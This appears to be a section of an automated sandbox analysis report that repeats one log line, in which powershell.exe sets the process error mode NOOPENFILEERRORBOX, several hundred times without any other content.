                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
